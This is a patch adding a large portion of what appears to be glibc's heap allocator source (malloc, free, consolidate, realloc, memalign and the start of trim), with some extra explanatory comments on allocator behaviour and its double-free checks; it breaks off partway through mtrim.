+            {
+              set_inuse_bit_at_offset (victim, size);
+              if (av != &main_arena)
+		set_non_main_arena (victim);
+#if USE_TCACHE
+	      /* Fill cache first, return to user only if cache fills.
+		 We may return one of these chunks later.  */
+	      if (tcache_nb
+		  && tcache->counts[tc_idx] < mp_.tcache_count)
+		{
+		  tcache_put (victim, tc_idx);
+		  return_cached = 1;
+		  continue;
+		}
+	      else
+		{
+#endif
+              check_malloced_chunk (av, victim, nb);
+              void *p = chunk2mem (victim);
+              alloc_perturb (p, bytes);
+              return p;
+#if USE_TCACHE
+		}
+#endif
+            }
+
+          /* place chunk in bin */
+
+          if (in_smallbin_range (size))
+            {
+              victim_index = smallbin_index (size);
+              bck = bin_at (av, victim_index);
+              fwd = bck->fd;
+            }
+          else
+            {
+              victim_index = largebin_index (size);
+              bck = bin_at (av, victim_index);
+              fwd = bck->fd;
+
+              /* maintain large bins in sorted order */
+              if (fwd != bck)
+                {
+                  /* Or with inuse bit to speed comparisons */
+                  size |= PREV_INUSE;
+                  /* if smaller than smallest, bypass loop below */
+                  assert (chunk_main_arena (bck->bk));
+                  if ((unsigned long) (size)
+		      < (unsigned long) chunksize_nomask (bck->bk))
+                    {
+                      fwd = bck;
+                      bck = bck->bk;
+
+                      victim->fd_nextsize = fwd->fd;
+                      victim->bk_nextsize = fwd->fd->bk_nextsize;
+                      fwd->fd->bk_nextsize = victim->bk_nextsize->fd_nextsize = victim;
+                    }
+                  else
+                    {
+                      assert (chunk_main_arena (fwd));
+                      while ((unsigned long) size < chunksize_nomask (fwd))
+                        {
+                          fwd = fwd->fd_nextsize;
+			  assert (chunk_main_arena (fwd));
+                        }
+
+                      if ((unsigned long) size
+			  == (unsigned long) chunksize_nomask (fwd))
+                        /* Always insert in the second position.  */
+                        fwd = fwd->fd;
+                      else
+                        {
+                          victim->fd_nextsize = fwd;
+                          victim->bk_nextsize = fwd->bk_nextsize;
+                          if (__glibc_unlikely (fwd->bk_nextsize->fd_nextsize != fwd))
+                            malloc_printerr ("malloc(): largebin double linked list corrupted (nextsize)");
+                          fwd->bk_nextsize = victim;
+                          victim->bk_nextsize->fd_nextsize = victim;
+                        }
+                      bck = fwd->bk;
+                      if (bck->fd != fwd)
+                        malloc_printerr ("malloc(): largebin double linked list corrupted (bk)");
+                    }
+                }
+              else
+                victim->fd_nextsize = victim->bk_nextsize = victim;
+            }
+
+          mark_bin (av, victim_index);
+          victim->bk = bck;
+          victim->fd = fwd;
+          fwd->bk = victim;
+          bck->fd = victim;
+
+#if USE_TCACHE
+      /* If we've processed as many chunks as we're allowed while
+	 filling the cache, return one of the cached ones.  */
+      ++tcache_unsorted_count;
+      if (return_cached
+	  && mp_.tcache_unsorted_limit > 0
+	  && tcache_unsorted_count > mp_.tcache_unsorted_limit)
+	{
+	  return tcache_get (tc_idx);
+	}
+#endif
+
+#define MAX_ITERS       10000
+          if (++iters >= MAX_ITERS)
+            break;
+        }
+
+#if USE_TCACHE
+      /* If all the small chunks we found ended up cached, return one now.  */
+      if (return_cached)
+	{
+	  return tcache_get (tc_idx);
+	}
+#endif
+
+      /*
+         If a large request, scan through the chunks of current bin in
+         sorted order to find smallest that fits.  Use the skip list for this.
+       */
+
+      if (!in_smallbin_range (nb))
+        {
+          bin = bin_at (av, idx);
+
+          /* skip scan if empty or largest chunk is too small */
+          if ((victim = first (bin)) != bin
+	      && (unsigned long) chunksize_nomask (victim)
+	        >= (unsigned long) (nb))
+            {
+              victim = victim->bk_nextsize;
+              while (((unsigned long) (size = chunksize (victim)) <
+                      (unsigned long) (nb)))
+                victim = victim->bk_nextsize;
+
+              /* Avoid removing the first entry for a size so that the skip
+                 list does not have to be rerouted.  */
+              if (victim != last (bin)
+		  && chunksize_nomask (victim)
+		    == chunksize_nomask (victim->fd))
+                victim = victim->fd;
+
+              remainder_size = size - nb;
+              unlink_chunk (av, victim);
+
+              /* Exhaust */
+              if (remainder_size < MINSIZE)
+                {
+                  set_inuse_bit_at_offset (victim, size);
+                  if (av != &main_arena)
+		    set_non_main_arena (victim);
+                }
+              /* Split */
+              else
+                {
+                  remainder = chunk_at_offset (victim, nb);
+                  /* We cannot assume the unsorted list is empty and therefore
+                     have to perform a complete insert here.  */
+                  bck = unsorted_chunks (av);
+                  fwd = bck->fd;
+		  if (__glibc_unlikely (fwd->bk != bck))
+		    malloc_printerr ("malloc(): corrupted unsorted chunks");
+                  remainder->bk = bck;
+                  remainder->fd = fwd;
+                  bck->fd = remainder;
+                  fwd->bk = remainder;
+                  if (!in_smallbin_range (remainder_size))
+                    {
+                      remainder->fd_nextsize = NULL;
+                      remainder->bk_nextsize = NULL;
+                    }
+                  set_head (victim, nb | PREV_INUSE |
+                            (av != &main_arena ? NON_MAIN_ARENA : 0));
+                  set_head (remainder, remainder_size | PREV_INUSE);
+                  set_foot (remainder, remainder_size);
+                }
+              check_malloced_chunk (av, victim, nb);
+              void *p = chunk2mem (victim);
+              alloc_perturb (p, bytes);
+              return p;
+            }
+        }
+
+      /*
+         Search for a chunk by scanning bins, starting with next largest
+         bin. This search is strictly by best-fit; i.e., the smallest
+         (with ties going to approximately the least recently used) chunk
+         that fits is selected.
+
+         The bitmap avoids needing to check that most blocks are nonempty.
+         The particular case of skipping all bins during warm-up phases
+         when no chunks have been returned yet is faster than it might look.
+       */
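+      /* Note: the binmap keeps one bit per bin; mark_bin () above sets a bit
+         when a chunk is binned, but bits are only cleared lazily in the
+         "false alarm" branch below when a scan finds the bin empty.  A set
+         bit therefore means "possibly non-empty", which is why the
+         emptiness re-check below is still needed.  */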
+
+      ++idx;
+      bin = bin_at (av, idx);
+      block = idx2block (idx);
+      map = av->binmap[block];
+      bit = idx2bit (idx);
+
+      for (;; )
+        {
+          /* Skip rest of block if there are no more set bits in this block.  */
+          if (bit > map || bit == 0)
+            {
+              do
+                {
+                  if (++block >= BINMAPSIZE) /* out of bins */
+                    goto use_top;
+                }
+              while ((map = av->binmap[block]) == 0);
+
+              bin = bin_at (av, (block << BINMAPSHIFT));
+              bit = 1;
+            }
+
+          /* Advance to bin with set bit. There must be one. */
+          while ((bit & map) == 0)
+            {
+              bin = next_bin (bin);
+              bit <<= 1;
+              assert (bit != 0);
+            }
+
+          /* Inspect the bin. It is likely to be non-empty */
+          victim = last (bin);
+
+          /*  If a false alarm (empty bin), clear the bit. */
+          if (victim == bin)
+            {
+              av->binmap[block] = map &= ~bit; /* Write through */
+              bin = next_bin (bin);
+              bit <<= 1;
+            }
+
+          else
+            {
+              size = chunksize (victim);
+
+              /*  We know the first chunk in this bin is big enough to use. */
+              assert ((unsigned long) (size) >= (unsigned long) (nb));
+
+              remainder_size = size - nb;
+
+              /* unlink */
+              unlink_chunk (av, victim);
+
+              /* Exhaust */
+              if (remainder_size < MINSIZE)
+                {
+                  set_inuse_bit_at_offset (victim, size);
+                  if (av != &main_arena)
+		    set_non_main_arena (victim);
+                }
+
+              /* Split */
+              else
+                {
+                  remainder = chunk_at_offset (victim, nb);
+
+                  /* We cannot assume the unsorted list is empty and therefore
+                     have to perform a complete insert here.  */
+                  bck = unsorted_chunks (av);
+                  fwd = bck->fd;
+		  if (__glibc_unlikely (fwd->bk != bck))
+		    malloc_printerr ("malloc(): corrupted unsorted chunks 2");
+                  remainder->bk = bck;
+                  remainder->fd = fwd;
+                  bck->fd = remainder;
+                  fwd->bk = remainder;
+
+                  /* advertise as last remainder */
+                  if (in_smallbin_range (nb))
+                    av->last_remainder = remainder;
+                  if (!in_smallbin_range (remainder_size))
+                    {
+                      remainder->fd_nextsize = NULL;
+                      remainder->bk_nextsize = NULL;
+                    }
+                  set_head (victim, nb | PREV_INUSE |
+                            (av != &main_arena ? NON_MAIN_ARENA : 0));
+                  set_head (remainder, remainder_size | PREV_INUSE);
+                  set_foot (remainder, remainder_size);
+                }
+              check_malloced_chunk (av, victim, nb);
+              void *p = chunk2mem (victim);
+              alloc_perturb (p, bytes);
+              return p;
+            }
+        }
+
+    use_top:
+      /*
+         If large enough, split off the chunk bordering the end of memory
+         (held in av->top). Note that this is in accord with the best-fit
+         search rule.  In effect, av->top is treated as larger (and thus
+         less well fitting) than any other available chunk since it can
+         be extended to be as large as necessary (up to system
+         limitations).
+
+         We require that av->top always exists (i.e., has size >=
+         MINSIZE) after initialization, so if it would otherwise be
+         exhausted by current request, it is replenished. (The main
+         reason for ensuring it exists is that we may need MINSIZE space
+         to put in fenceposts in sysmalloc.)
+       */
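+      /* Illustrative sketch (not part of the upstream sources): in a fresh
+         arena every bin is empty, so requests fall through to this point
+         and are carved off the top chunk, e.g.
+
+           void *a = malloc (0x100);   // split from av->top
+           void *b = malloc (0x100);   // split from the new, smaller top;
+                                       // b ends up just above a in memory
+
+         (assuming an empty tcache and requests small enough not to be
+         mmapped).  */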
+
+      victim = av->top;
+      size = chunksize (victim);
+
+      if (__glibc_unlikely (size > av->system_mem))
+        malloc_printerr ("malloc(): corrupted top size");
+
+      if ((unsigned long) (size) >= (unsigned long) (nb + MINSIZE))
+        {
+          remainder_size = size - nb;
+          remainder = chunk_at_offset (victim, nb);
+          av->top = remainder;
+          set_head (victim, nb | PREV_INUSE |
+                    (av != &main_arena ? NON_MAIN_ARENA : 0));
+          set_head (remainder, remainder_size | PREV_INUSE);
+
+          check_malloced_chunk (av, victim, nb);
+          void *p = chunk2mem (victim);
+          alloc_perturb (p, bytes);
+          return p;
+        }
+
+      /* When we are using atomic ops to free fast chunks we can get
+         here for all block sizes.  */
+      else if (atomic_load_relaxed (&av->have_fastchunks))
+        {
+          malloc_consolidate (av);
+          /* restore original bin index */
+          if (in_smallbin_range (nb))
+            idx = smallbin_index (nb);
+          else
+            idx = largebin_index (nb);
+        }
+
+      /*
+         Otherwise, relay to handle system-dependent cases
+       */
+      else
+        {
+          void *p = sysmalloc (nb, av);
+          if (p != NULL)
+            alloc_perturb (p, bytes);
+          return p;
+        }
+    }
+}
+
+/*
+   ------------------------------ free ------------------------------
+ */
+
+static void
+_int_free (mstate av, mchunkptr p, int have_lock)
+{
+  INTERNAL_SIZE_T size;        /* its size */
+  mfastbinptr *fb;             /* associated fastbin */
+  mchunkptr nextchunk;         /* next contiguous chunk */
+  INTERNAL_SIZE_T nextsize;    /* its size */
+  int nextinuse;               /* true if nextchunk is used */
+  INTERNAL_SIZE_T prevsize;    /* size of previous contiguous chunk */
+  mchunkptr bck;               /* misc temp for linking */
+  mchunkptr fwd;               /* misc temp for linking */
+
+  size = chunksize (p);
+
+  /* Little security check which won't hurt performance: the
+     allocator never wraps around at the end of the address space.
+     Therefore we can exclude some size values which might appear
+     here by accident or by "design" from some intruder.  */
+  if (__builtin_expect ((uintptr_t) p > (uintptr_t) -size, 0)
+      || __builtin_expect (misaligned_chunk (p), 0))
+    malloc_printerr ("free(): invalid pointer");
+  /* We know that each chunk is at least MINSIZE bytes in size and a
+     multiple of MALLOC_ALIGNMENT.  */
+  if (__glibc_unlikely (size < MINSIZE || !aligned_OK (size)))
+    malloc_printerr ("free(): invalid size");
+
+  check_inuse_chunk(av, p);
+
+#if USE_TCACHE
+  {
+    size_t tc_idx = csize2tidx (size);
+    if (tcache != NULL && tc_idx < mp_.tcache_bins)
+      {
+	/* Check to see if it's already in the tcache.  */
+	tcache_entry *e = (tcache_entry *) chunk2mem (p);
+
+	/* This test succeeds on double free.  However, we don't 100%
+	   trust it (it also matches random payload data at a 1 in
+	   2^<size_t> chance), so verify it's not an unlikely
+	   coincidence before aborting.  */
+	if (__glibc_unlikely (e->key == tcache))
+	  {
+	    tcache_entry *tmp;
+	    LIBC_PROBE (memory_tcache_double_free, 2, e, tc_idx);
+	    for (tmp = tcache->entries[tc_idx];
+		 tmp;
+		 tmp = tmp->next)
+	      if (tmp == e)
+		malloc_printerr ("free(): double free detected in tcache 2");
+	    /* If we get here, it was a coincidence.  We've wasted a
+	       few cycles, but don't abort.  */
+	  }
+
+	if (tcache->counts[tc_idx] < mp_.tcache_count)
+	  {
+	    tcache_put (p, tc_idx);
+	    return;
+	  }
+      }
+  }
+#endif
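+
+  /* Illustrative sketch (not part of the upstream sources) of the classic
+     mistake the key check above is meant to catch, assuming the tcache is
+     enabled and not yet full for this size:
+
+       void *a = malloc (0x20);
+       free (a);   // tcache_put () stores a and sets e->key = tcache
+       free (a);   // e->key still matches, the entries list is walked and
+                   // "free(): double free detected in tcache 2" aborts
+   */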
+
+  /*
+    If eligible, place chunk on a fastbin so it can be found
+    and used quickly in malloc.
+  */
+
+  if ((unsigned long)(size) <= (unsigned long)(get_max_fast ())
+
+#if TRIM_FASTBINS
+      /*
+	If TRIM_FASTBINS set, don't place chunks
+	bordering top into fastbins
+      */
+      && (chunk_at_offset(p, size) != av->top)
+#endif
+      ) {
+
+    if (__builtin_expect (chunksize_nomask (chunk_at_offset (p, size))
+			  <= 2 * SIZE_SZ, 0)
+	|| __builtin_expect (chunksize (chunk_at_offset (p, size))
+			     >= av->system_mem, 0))
+      {
+	bool fail = true;
+	/* We might not have a lock at this point and concurrent modifications
+	   of system_mem might result in a false positive.  Redo the test after
+	   getting the lock.  */
+	if (!have_lock)
+	  {
+	    __libc_lock_lock (av->mutex);
+	    fail = (chunksize_nomask (chunk_at_offset (p, size)) <= 2 * SIZE_SZ
+		    || chunksize (chunk_at_offset (p, size)) >= av->system_mem);
+	    __libc_lock_unlock (av->mutex);
+	  }
+
+	if (fail)
+	  malloc_printerr ("free(): invalid next size (fast)");
+      }
+
+    free_perturb (chunk2mem(p), size - 2 * SIZE_SZ);
+
+    atomic_store_relaxed (&av->have_fastchunks, true);
+    unsigned int idx = fastbin_index(size);
+    fb = &fastbin (av, idx);
+
+    /* Atomically link P to its fastbin: P->FD = *FB; *FB = P;  */
+    mchunkptr old = *fb, old2;
+
+    if (SINGLE_THREAD_P)
+      {
+	/* Check that the top of the bin is not the record we are going to
+	   add (i.e., double free).  */
+	if (__builtin_expect (old == p, 0))
+	  malloc_printerr ("double free or corruption (fasttop)");
+	p->fd = old;
+	*fb = p;
+      }
+    else
+      do
+	{
+	  /* Check that the top of the bin is not the record we are going to
+	     add (i.e., double free).  */
+	  if (__builtin_expect (old == p, 0))
+	    malloc_printerr ("double free or corruption (fasttop)");
+	  p->fd = old2 = old;
+	}
+      while ((old = catomic_compare_and_exchange_val_rel (fb, p, old2))
+	     != old2);
+
+    /* Check that size of fastbin chunk at the top is the same as
+       size of the chunk that we are adding.  We can dereference OLD
+       only if we have the lock, otherwise it might have already been
+       allocated again.  */
+    if (have_lock && old != NULL
+	&& __builtin_expect (fastbin_index (chunksize (old)) != idx, 0))
+      malloc_printerr ("invalid fastbin entry (free)");
+  }
+
+  /*
+    Consolidate other non-mmapped chunks as they arrive.
+  */
+
+  else if (!chunk_is_mmapped(p)) {
+
+    /* If we're single-threaded, don't lock the arena.  */
+    if (SINGLE_THREAD_P)
+      have_lock = true;
+
+    if (!have_lock)
+      __libc_lock_lock (av->mutex);
+
+    nextchunk = chunk_at_offset(p, size);
+
+    /* Lightweight tests: check whether the block is already the
+       top block.  */
+    if (__glibc_unlikely (p == av->top))
+      malloc_printerr ("double free or corruption (top)");
+    /* Or whether the next chunk is beyond the boundaries of the arena.  */
+    if (__builtin_expect (contiguous (av)
+			  && (char *) nextchunk
+			  >= ((char *) av->top + chunksize(av->top)), 0))
+	malloc_printerr ("double free or corruption (out)");
+    /* Or whether the block is actually not marked used.  */
+    if (__glibc_unlikely (!prev_inuse(nextchunk)))
+      malloc_printerr ("double free or corruption (!prev)");
+
+    nextsize = chunksize(nextchunk);
+    if (__builtin_expect (chunksize_nomask (nextchunk) <= 2 * SIZE_SZ, 0)
+	|| __builtin_expect (nextsize >= av->system_mem, 0))
+      malloc_printerr ("free(): invalid next size (normal)");
+
+    free_perturb (chunk2mem(p), size - 2 * SIZE_SZ);
+
+    /* consolidate backward */
+    if (!prev_inuse(p)) {
+      prevsize = prev_size (p);
+      size += prevsize;
+      p = chunk_at_offset(p, -((long) prevsize));
+      if (__glibc_unlikely (chunksize(p) != prevsize))
+        malloc_printerr ("corrupted size vs. prev_size while consolidating");
+      unlink_chunk (av, p);
+    }
+
+    if (nextchunk != av->top) {
+      /* get and clear inuse bit */
+      nextinuse = inuse_bit_at_offset(nextchunk, nextsize);
+
+      /* consolidate forward */
+      if (!nextinuse) {
+	unlink_chunk (av, nextchunk);
+	size += nextsize;
+      } else
+	clear_inuse_bit_at_offset(nextchunk, 0);
+
+      /*
+	Place the chunk in unsorted chunk list. Chunks are
+	not placed into regular bins until after they have
+	been given one chance to be used in malloc.
+      */
+
+      bck = unsorted_chunks(av);
+      fwd = bck->fd;
+      if (__glibc_unlikely (fwd->bk != bck))
+	malloc_printerr ("free(): corrupted unsorted chunks");
+      p->fd = fwd;
+      p->bk = bck;
+      if (!in_smallbin_range(size))
+	{
+	  p->fd_nextsize = NULL;
+	  p->bk_nextsize = NULL;
+	}
+      bck->fd = p;
+      fwd->bk = p;
+
+      set_head(p, size | PREV_INUSE);
+      set_foot(p, size);
+
+      check_free_chunk(av, p);
+    }
+
+    /*
+      If the chunk borders the current high end of memory,
+      consolidate into top
+    */
+
+    else {
+      size += nextsize;
+      set_head(p, size | PREV_INUSE);
+      av->top = p;
+      check_chunk(av, p);
+    }
+
+    /*
+      If freeing a large space, consolidate possibly-surrounding
+      chunks. Then, if the total unused topmost memory exceeds trim
+      threshold, ask malloc_trim to reduce top.
+
+      Unless max_fast is 0, we don't know if there are fastbins
+      bordering top, so we cannot tell for sure whether threshold
+      has been reached unless fastbins are consolidated.  But we
+      don't want to consolidate on each free.  As a compromise,
+      consolidation is performed if FASTBIN_CONSOLIDATION_THRESHOLD
+      is reached.
+    */
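+    /* FASTBIN_CONSOLIDATION_THRESHOLD is defined earlier in this file as
+       65536, so only frees that produce a fairly large coalesced chunk pay
+       for a full fastbin consolidation and a possible trim of the top chunk
+       or of a non-main heap.  */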
+
+    if ((unsigned long)(size) >= FASTBIN_CONSOLIDATION_THRESHOLD) {
+      if (atomic_load_relaxed (&av->have_fastchunks))
+	malloc_consolidate(av);
+
+      if (av == &main_arena) {
+#ifndef MORECORE_CANNOT_TRIM
+	if ((unsigned long)(chunksize(av->top)) >=
+	    (unsigned long)(mp_.trim_threshold))
+	  systrim(mp_.top_pad, av);
+#endif
+      } else {
+	/* Always try heap_trim(), even if the top chunk is not
+	   large, because the corresponding heap might go away.  */
+	heap_info *heap = heap_for_ptr(top(av));
+
+	assert(heap->ar_ptr == av);
+	heap_trim(heap, mp_.top_pad);
+      }
+    }
+
+    if (!have_lock)
+      __libc_lock_unlock (av->mutex);
+  }
+  /*
+    If the chunk was allocated via mmap, release via munmap().
+  */
+
+  else {
+    munmap_chunk (p);
+  }
+}
+
+/*
+  ------------------------- malloc_consolidate -------------------------
+
+  malloc_consolidate is a specialized version of free() that tears
+  down chunks held in fastbins.  Free itself cannot be used for this
+  purpose since, among other things, it might place chunks back onto
+  fastbins.  So, instead, we need to use a minor variant of the same
+  code.
+*/
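+
+/* In this file malloc_consolidate is reached from several places: from
+   _int_malloc when a large request finds fastbin chunks pending or when the
+   top chunk cannot satisfy a request, from _int_free once a coalesced chunk
+   reaches FASTBIN_CONSOLIDATION_THRESHOLD, from mtrim before trimming, and
+   from __libc_mallopt before max_fast is changed.  */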
+
+static void malloc_consolidate(mstate av)
+{
+  mfastbinptr*    fb;                 /* current fastbin being consolidated */
+  mfastbinptr*    maxfb;              /* last fastbin (for loop control) */
+  mchunkptr       p;                  /* current chunk being consolidated */
+  mchunkptr       nextp;              /* next chunk to consolidate */
+  mchunkptr       unsorted_bin;       /* bin header */
+  mchunkptr       first_unsorted;     /* chunk to link to */
+
+  /* These have same use as in free() */
+  mchunkptr       nextchunk;
+  INTERNAL_SIZE_T size;
+  INTERNAL_SIZE_T nextsize;
+  INTERNAL_SIZE_T prevsize;
+  int             nextinuse;
+
+  atomic_store_relaxed (&av->have_fastchunks, false);
+
+  unsorted_bin = unsorted_chunks(av);
+
+  /*
+    Remove each chunk from fast bin and consolidate it, placing it
+    then in unsorted bin. Among other reasons for doing this,
+    placing in unsorted bin avoids needing to calculate actual bins
+    until malloc is sure that chunks aren't immediately going to be
+    reused anyway.
+  */
+
+  maxfb = &fastbin (av, NFASTBINS - 1);
+  fb = &fastbin (av, 0);
+  do {
+    p = atomic_exchange_acq (fb, NULL);
+    if (p != 0) {
+      do {
+	{
+	  unsigned int idx = fastbin_index (chunksize (p));
+	  if ((&fastbin (av, idx)) != fb)
+	    malloc_printerr ("malloc_consolidate(): invalid chunk size");
+	}
+
+	check_inuse_chunk(av, p);
+	nextp = p->fd;
+
+	/* Slightly streamlined version of consolidation code in free() */
+	size = chunksize (p);
+	nextchunk = chunk_at_offset(p, size);
+	nextsize = chunksize(nextchunk);
+
+	if (!prev_inuse(p)) {
+	  prevsize = prev_size (p);
+	  size += prevsize;
+	  p = chunk_at_offset(p, -((long) prevsize));
+	  if (__glibc_unlikely (chunksize(p) != prevsize))
+	    malloc_printerr ("corrupted size vs. prev_size in fastbins");
+	  unlink_chunk (av, p);
+	}
+
+	if (nextchunk != av->top) {
+	  nextinuse = inuse_bit_at_offset(nextchunk, nextsize);
+
+	  if (!nextinuse) {
+	    size += nextsize;
+	    unlink_chunk (av, nextchunk);
+	  } else
+	    clear_inuse_bit_at_offset(nextchunk, 0);
+
+	  first_unsorted = unsorted_bin->fd;
+	  unsorted_bin->fd = p;
+	  first_unsorted->bk = p;
+
+	  if (!in_smallbin_range (size)) {
+	    p->fd_nextsize = NULL;
+	    p->bk_nextsize = NULL;
+	  }
+
+	  set_head(p, size | PREV_INUSE);
+	  p->bk = unsorted_bin;
+	  p->fd = first_unsorted;
+	  set_foot(p, size);
+	}
+
+	else {
+	  size += nextsize;
+	  set_head(p, size | PREV_INUSE);
+	  av->top = p;
+	}
+
+      } while ( (p = nextp) != 0);
+
+    }
+  } while (fb++ != maxfb);
+}
+
+/*
+  ------------------------------ realloc ------------------------------
+*/
+
+void*
+_int_realloc(mstate av, mchunkptr oldp, INTERNAL_SIZE_T oldsize,
+	     INTERNAL_SIZE_T nb)
+{
+  mchunkptr        newp;            /* chunk to return */
+  INTERNAL_SIZE_T  newsize;         /* its size */
+  void*          newmem;          /* corresponding user mem */
+
+  mchunkptr        next;            /* next contiguous chunk after oldp */
+
+  mchunkptr        remainder;       /* extra space at end of newp */
+  unsigned long    remainder_size;  /* its size */
+
+  /* oldmem size */
+  if (__builtin_expect (chunksize_nomask (oldp) <= 2 * SIZE_SZ, 0)
+      || __builtin_expect (oldsize >= av->system_mem, 0))
+    malloc_printerr ("realloc(): invalid old size");
+
+  check_inuse_chunk (av, oldp);
+
+  /* All callers already filter out mmap'ed chunks.  */
+  assert (!chunk_is_mmapped (oldp));
+
+  next = chunk_at_offset (oldp, oldsize);
+  INTERNAL_SIZE_T nextsize = chunksize (next);
+  if (__builtin_expect (chunksize_nomask (next) <= 2 * SIZE_SZ, 0)
+      || __builtin_expect (nextsize >= av->system_mem, 0))
+    malloc_printerr ("realloc(): invalid next size");
+
+  if ((unsigned long) (oldsize) >= (unsigned long) (nb))
+    {
+      /* already big enough; split below */
+      newp = oldp;
+      newsize = oldsize;
+    }
+
+  else
+    {
+      /* Try to expand forward into top */
+      if (next == av->top &&
+          (unsigned long) (newsize = oldsize + nextsize) >=
+          (unsigned long) (nb + MINSIZE))
+        {
+          set_head_size (oldp, nb | (av != &main_arena ? NON_MAIN_ARENA : 0));
+          av->top = chunk_at_offset (oldp, nb);
+          set_head (av->top, (newsize - nb) | PREV_INUSE);
+          check_inuse_chunk (av, oldp);
+          return chunk2mem (oldp);
+        }
+
+      /* Try to expand forward into next chunk;  split off remainder below */
+      else if (next != av->top &&
+               !inuse (next) &&
+               (unsigned long) (newsize = oldsize + nextsize) >=
+               (unsigned long) (nb))
+        {
+          newp = oldp;
+          unlink_chunk (av, next);
+        }
+
+      /* allocate, copy, free */
+      else
+        {
+          newmem = _int_malloc (av, nb - MALLOC_ALIGN_MASK);
+          if (newmem == 0)
+            return 0; /* propagate failure */
+
+          newp = mem2chunk (newmem);
+          newsize = chunksize (newp);
+
+          /*
+             Avoid copy if newp is next chunk after oldp.
+           */
+          if (newp == next)
+            {
+              newsize += oldsize;
+              newp = oldp;
+            }
+          else
+            {
+	      memcpy (newmem, chunk2mem (oldp), oldsize - SIZE_SZ);
+              _int_free (av, oldp, 1);
+              check_inuse_chunk (av, newp);
+              return chunk2mem (newp);
+            }
+        }
+    }
+
+  /* If possible, free extra space in old or extended chunk */
+
+  assert ((unsigned long) (newsize) >= (unsigned long) (nb));
+
+  remainder_size = newsize - nb;
+
+  if (remainder_size < MINSIZE)   /* not enough extra to split off */
+    {
+      set_head_size (newp, newsize | (av != &main_arena ? NON_MAIN_ARENA : 0));
+      set_inuse_bit_at_offset (newp, newsize);
+    }
+  else   /* split remainder */
+    {
+      remainder = chunk_at_offset (newp, nb);
+      set_head_size (newp, nb | (av != &main_arena ? NON_MAIN_ARENA : 0));
+      set_head (remainder, remainder_size | PREV_INUSE |
+                (av != &main_arena ? NON_MAIN_ARENA : 0));
+      /* Mark remainder as inuse so free() won't complain */
+      set_inuse_bit_at_offset (remainder, remainder_size);
+      _int_free (av, remainder, 1);
+    }
+
+  check_inuse_chunk (av, newp);
+  return chunk2mem (newp);
+}
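+
+/* Illustrative sketch (not part of the upstream sources) of the strategy
+   above as seen from user code:
+
+     char *p = malloc (0x100);
+     p = realloc (p, 0x180);   // kept in place if the old chunk is already
+                               // big enough, borders av->top, or can absorb
+                               // a free next chunk; otherwise the contents
+                               // are copied to a new chunk and the old one
+                               // is freed
+ */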
+
+/*
+   ------------------------------ memalign ------------------------------
+ */
+
+static void *
+_int_memalign (mstate av, size_t alignment, size_t bytes)
+{
+  INTERNAL_SIZE_T nb;             /* padded  request size */
+  char *m;                        /* memory returned by malloc call */
+  mchunkptr p;                    /* corresponding chunk */
+  char *brk;                      /* alignment point within p */
+  mchunkptr newp;                 /* chunk to return */
+  INTERNAL_SIZE_T newsize;        /* its size */
+  INTERNAL_SIZE_T leadsize;       /* leading space before alignment point */
+  mchunkptr remainder;            /* spare room at end to split off */
+  unsigned long remainder_size;   /* its size */
+  INTERNAL_SIZE_T size;
+
+
+
+  if (!checked_request2size (bytes, &nb))
+    {
+      __set_errno (ENOMEM);
+      return NULL;
+    }
+
+  /*
+     Strategy: find a spot within that chunk that meets the alignment
+     request, and then possibly free the leading and trailing space.
+   */
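+  /* The aligned spot below is found with the usual power-of-two rounding,
+     (m + alignment - 1) & -alignment; e.g. with alignment == 0x100 a pointer
+     0x5554e0 rounds up to 0x555500.  If that leaves fewer than MINSIZE bytes
+     of leading space to give back, the code moves one more alignment step
+     forward, which the worst-case padding requested below guarantees is
+     still inside the chunk.  */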
+
+  /* Call malloc with worst case padding to hit alignment. */
+
+  m = (char *) (_int_malloc (av, nb + alignment + MINSIZE));
+
+  if (m == 0)
+    return 0;           /* propagate failure */
+
+  p = mem2chunk (m);
+
+  if ((((unsigned long) (m)) % alignment) != 0)   /* misaligned */
+
+    { /*
+                Find an aligned spot inside chunk.  Since we need to give back
+                leading space in a chunk of at least MINSIZE, if the first
+                calculation places us at a spot with less than MINSIZE leader,
+                we can move to the next aligned spot -- we've allocated enough
+                total room so that this is always possible.
+                 */
+      brk = (char *) mem2chunk (((unsigned long) (m + alignment - 1)) &
+                                - ((signed long) alignment));
+      if ((unsigned long) (brk - (char *) (p)) < MINSIZE)
+        brk += alignment;
+
+      newp = (mchunkptr) brk;
+      leadsize = brk - (char *) (p);
+      newsize = chunksize (p) - leadsize;
+
+      /* For mmapped chunks, just adjust offset */
+      if (chunk_is_mmapped (p))
+        {
+          set_prev_size (newp, prev_size (p) + leadsize);
+          set_head (newp, newsize | IS_MMAPPED);
+          return chunk2mem (newp);
+        }
+
+      /* Otherwise, give back leader, use the rest */
+      set_head (newp, newsize | PREV_INUSE |
+                (av != &main_arena ? NON_MAIN_ARENA : 0));
+      set_inuse_bit_at_offset (newp, newsize);
+      set_head_size (p, leadsize | (av != &main_arena ? NON_MAIN_ARENA : 0));
+      _int_free (av, p, 1);
+      p = newp;
+
+      assert (newsize >= nb &&
+              (((unsigned long) (chunk2mem (p))) % alignment) == 0);
+    }
+
+  /* Also give back spare room at the end */
+  if (!chunk_is_mmapped (p))
+    {
+      size = chunksize (p);
+      if ((unsigned long) (size) > (unsigned long) (nb + MINSIZE))
+        {
+          remainder_size = size - nb;
+          remainder = chunk_at_offset (p, nb);
+          set_head (remainder, remainder_size | PREV_INUSE |
+                    (av != &main_arena ? NON_MAIN_ARENA : 0));
+          set_head_size (p, nb);
+          _int_free (av, remainder, 1);
+        }
+    }
+
+  check_inuse_chunk (av, p);
+  return chunk2mem (p);
+}
+
+
+/*
+   ------------------------------ malloc_trim ------------------------------
+ */
+
+static int
+mtrim (mstate av, size_t pad)
+{
+  /* Ensure all blocks are consolidated.  */
+  malloc_consolidate (av);
+
+  const size_t ps = GLRO (dl_pagesize);
+  int psindex = bin_index (ps);
+  const size_t psm1 = ps - 1;
+
+  int result = 0;
+  for (int i = 1; i < NBINS; ++i)
+    if (i == 1 || i >= psindex)
+      {
+        mbinptr bin = bin_at (av, i);
+
+        for (mchunkptr p = last (bin); p != bin; p = p->bk)
+          {
+            INTERNAL_SIZE_T size = chunksize (p);
+
+            if (size > psm1 + sizeof (struct malloc_chunk))
+              {
+                /* See whether the chunk contains at least one unused page.  */
+                char *paligned_mem = (char *) (((uintptr_t) p
+                                                + sizeof (struct malloc_chunk)
+                                                + psm1) & ~psm1);
+
+                assert ((char *) chunk2mem (p) + 4 * SIZE_SZ <= paligned_mem);
+                assert ((char *) p + size > paligned_mem);
+
+                /* This is the size we could potentially free.  */
+                size -= paligned_mem - (char *) p;
+
+                if (size > psm1)
